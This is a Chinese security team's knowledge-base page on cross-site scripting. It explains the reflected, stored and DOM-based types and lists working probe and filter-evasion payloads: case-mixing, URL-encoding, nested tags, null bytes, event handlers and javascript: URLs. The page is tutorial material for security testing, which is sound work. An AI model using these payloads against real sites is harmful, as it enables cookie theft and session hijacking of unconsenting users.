<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>XSS 跨站脚本漏洞 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/83.a2ff144a.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" aria-current="page" title="XSS 跨站脚本漏洞" class="active sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="xss跨站原理">XSS跨站原理 <a href="#xss跨站原理" class="header-anchor">#</a></h2> <p>当应用程序发送给浏览器的页面中包含用户提交的数据，但没有经过适当验证或转义时，就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性，而不是缺陷;</p> <p>浏览器同源策略：只有发布Cookie的网站才能读取Cookie。</p> <p>会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害</p> <h3 id="反射型">反射型 <a href="#反射型" class="header-anchor">#</a></h3> <p>出现在搜索栏，用户登录等地方，常用来窃取客户端的Cookie进行钓鱼欺骗。(需要用户去点击)</p> <p>想要窃取cookie要满足两个条件：</p> <blockquote><p>1.用户点击攻击者构造的URL</p> <p>2.访问被攻击的应用服务(即存在xss的网站)</p></blockquote> <h3 id="存储型">存储型 <a href="#存储型" class="header-anchor">#</a></h3> <p>出现在留言、评论、博客日志等交互处，直接影响Web服务器自身安全</p> <h3 id="dom型">DOM型 <a href="#dom型" class="header-anchor">#</a></h3> <p>基于文档对象模型(Document Object Model)的一种漏洞；</p> <p>DOM型与反射型类似，都需要攻击者诱使用户点击专门设计的URL；</p> <p>Dom型 xss 是通过 url 传入参数去控制触发的；</p> <p>Dom型返回页面源码中看不到输入的payload， 而是保存在浏览器的DOM中。</p> <p><strong>假设应用程序返回的页面包含以下脚本：</strong></p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>
    <span class="token keyword">var</span> url <span class="token operator">=</span> document<span class="token punctuation">.</span>location<span class="token punctuation">;</span>
    url <span class="token operator">=</span> <span class="token function">unescape</span><span class="token punctuation">(</span>url<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> message <span class="token operator">=</span> url<span class="token punctuation">.</span><span class="token function">substring</span><span class="token punctuation">(</span>url<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span><span class="token string">'message='</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">,</span>url<span class="token punctuation">.</span>length<span class="token punctuation">)</span><span class="token punctuation">;</span>
    document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span>message<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>把 javascript 代码作为message的参数，这段代码将会被动态的写入到页面中，</p> <p>并像服务器返回代码一样得以执行。</p> <p>DOM型与反射 型类似，都需要攻击者诱使用户点击专门设计的URL</p> <h2 id="查找利用xss漏洞">查找利用XSS漏洞 <a href="#查找利用xss漏洞" class="header-anchor">#</a></h2> <h3 id="基本验证">基本验证 <a href="#基本验证" class="header-anchor">#</a></h3> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>&quot;<span class="token operator">&gt;</span><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>把这个字符串提交给每个应用程序页面的每个参数；</p> <p>同时监控它的响应，如果攻击字符串原样出现在响应中，就可能存在XSS漏洞。</p> <p>许多应用可能会经过黑名单等简单的初步过滤，试图阻止XSS攻击；</p> <p>可以通过编码等方式绕过：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>&quot;<span class="token operator">&gt;</span><span class="token operator">&lt;</span>ScRiPt<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>ScRiPt<span class="token operator">&gt;</span>
&quot;<span class="token operator">%</span><span class="token number">3</span>e<span class="token operator">%</span><span class="token number">3</span>cscript<span class="token operator">%</span><span class="token number">3</span><span class="token function">ealert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">3</span>c<span class="token operator">/</span>script<span class="token operator">%</span><span class="token number">3</span>e
&quot;<span class="token operator">&gt;</span><span class="token operator">&lt;</span>scr<span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>ipt<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>scr<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>ipt<span class="token operator">&gt;</span>
<span class="token operator">%</span><span class="token number">00</span>&quot;<span class="token operator">&gt;</span><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>当利用基于DOM的XSS漏洞时，攻击有效载荷并不在服务器的响应中返回，而是保存在浏览器的DOM中，并可被客户端javascript访问。</p> <p>在这种情况下，以上基本验证无法发现XSS漏洞。</p> <h2 id="查找反射型xss">查找反射型XSS <a href="#查找反射型xss" class="header-anchor">#</a></h2> <h4 id="测试引入脚本的反射">测试引入脚本的反射 <a href="#测试引入脚本的反射" class="header-anchor">#</a></h4> <p><strong>例1</strong>，标签属性值：</p> <p>假设返回页面中包含以下脚本：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>input type<span class="token operator">=</span><span class="token string">&quot;text&quot;</span> name<span class="token operator">=</span><span class="token string">&quot;name&quot;</span> value<span class="token operator">=</span><span class="token string">&quot;test-text&quot;</span> <span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>很明显，利用xss的方法是终止包含字符串的双引号，结束``标签</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>&quot;<span class="token operator">&gt;</span><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>例2</strong>，javascript字符串：</p> <p>假设返回页面中包含以下脚本：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token keyword">var</span> a<span class="token operator">=</span><span class="token string">'test-text'</span><span class="token punctuation">;</span> <span class="token keyword">var</span> b<span class="token operator">=</span><span class="token number">123</span><span class="token punctuation">;</span><span class="token operator">...</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>用分号终止语句</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token string">'; alert(1); var foo='</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>例3</strong>，包含URL的特性</p> <p>假设返回页面中包含以下脚本：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>a href<span class="token operator">=</span><span class="token string">&quot;test-text&quot;</span><span class="token operator">&gt;</span>Click here<span class="token operator">&lt;</span><span class="token operator">/</span>a<span class="token operator">&gt;</span>html
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这时，受控制的字符插入到一个``标签的<code>href</code>属性中。</p> <p>这个属性可能包含一个使用<code>javascript:</code>协议的URL，利用：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>javascript<span class="token operator">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="脚本标签">脚本标签 <a href="#脚本标签" class="header-anchor">#</a></h4> <p><strong>事件处理器</strong></p> <p>有大量事件处理器可与各种标签结合使用，用于执行脚本。</p> <p>一些示例，可在不需要任何用户交互的情况下执行脚本：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>style onreadystatechange<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>style<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>iframe onreadystatechange<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>iframe<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>object onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>object<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>img type<span class="token operator">=</span>image src<span class="token operator">=</span>valid<span class="token punctuation">.</span>gif onreadystatechange<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>input type<span class="token operator">=</span>image src<span class="token operator">=</span>valid<span class="token punctuation">.</span>gif onreadystatechange<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>body onbeforeactivate<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>body<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>video src<span class="token operator">=</span><span class="token number">1</span> onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>video<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>audio src<span class="token operator">=</span><span class="token number">1</span> onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>脚本伪协议</strong></p> <p>脚本伪协议可用在任何位置，以在需要URL的属性中执行行内脚本。</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>object data<span class="token operator">=</span>javascript<span class="token operator">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>object<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>iframe src<span class="token operator">=</span>javascript<span class="token operator">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>iframe<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>event<span class="token operator">-</span>source src<span class="token operator">=</span>javascript<span class="token operator">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token operator">&lt;</span><span class="token operator">/</span>event<span class="token operator">-</span>source<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h4 id="避开过滤-html">避开过滤:HTML <a href="#避开过滤-html" class="header-anchor">#</a></h4> <p><strong>标签名称</strong></p> <p>改变字符大小写</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>iMg onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>插入NULL字节</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span><span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">00</span><span class="token punctuation">]</span>img onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>标签名称后的空格</p> <p>一些可用于替代空格的字符</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>img<span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">09</span><span class="token punctuation">]</span>onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
